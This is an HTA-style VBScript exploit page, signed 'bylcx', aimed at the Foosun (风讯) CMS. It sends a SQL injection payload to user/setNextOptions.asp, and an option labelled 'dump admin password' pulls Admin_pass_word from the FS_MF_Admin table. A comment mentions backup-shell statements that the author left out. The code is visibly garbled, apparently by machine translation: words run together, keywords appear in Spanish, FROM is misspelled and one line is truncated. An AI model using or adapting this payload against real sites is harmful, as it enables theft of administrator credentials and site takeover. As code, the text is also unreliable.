<ScriptLanguage = "vBscript">
Subwindow_onload
Window.resizeto450,380
ventana.moveto300,300
Endsub
</script>
<ScriptLanguage = "vBscript">
Functiongethttppage (ruta)
t = getBody (ruta)
gethttppage = bytestobstr (t, "GB2312")
document.getElementById ("url"). inntext = gethttppage
Función final
</script>
<ScriptLanguage = "vBscript">
FunctionGetBody (URL)
OnerrorResumEnext
SetRetrieval = createObject ("Microsoft.xmlhttp")
Withrrieval
.Preen "Get", url, falso, "", ""
.Enviar
GetBody = .ResponseBody
Fin
SetRetrreieval = nada
Función final
FunctionByTestObstr (Body, CSET)
Dimobjstream
Setobjstream = createObject ("ADODB.Stream")
objstream.type = 1
objstream.mode = 3
objstream.
objstream.WriteBody
objstream.position = 0
objstream.type = 2
objstream.charset = cset
Bytestobstr = objstream.readText
objstream.close
Setobjstream = nada
Función final
</script>
<title> bylcx </title>
<inputid = "urlcode" name = "urlcode" size = "60" valor = "http: // 风讯 url/user/setNextOptions.asp">
<selectID = "SQL" name = "SQL" onChange = VBS: GethttpPage (document.getElementById ("urlcode"). valor+document.getElementById ("sql"). valor)>
<optionValue = ""> 风讯 sql 版注入 , 至于其它备份 shell 的语句懒得写了 </opción>
<optionValue = "? Equvalue = 1 & reqsql = Select%201, Admin_pass_word, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20FOM%20FS_MF_Admin%20Where 20id = 1-")"> 暴管理员密码 </opción>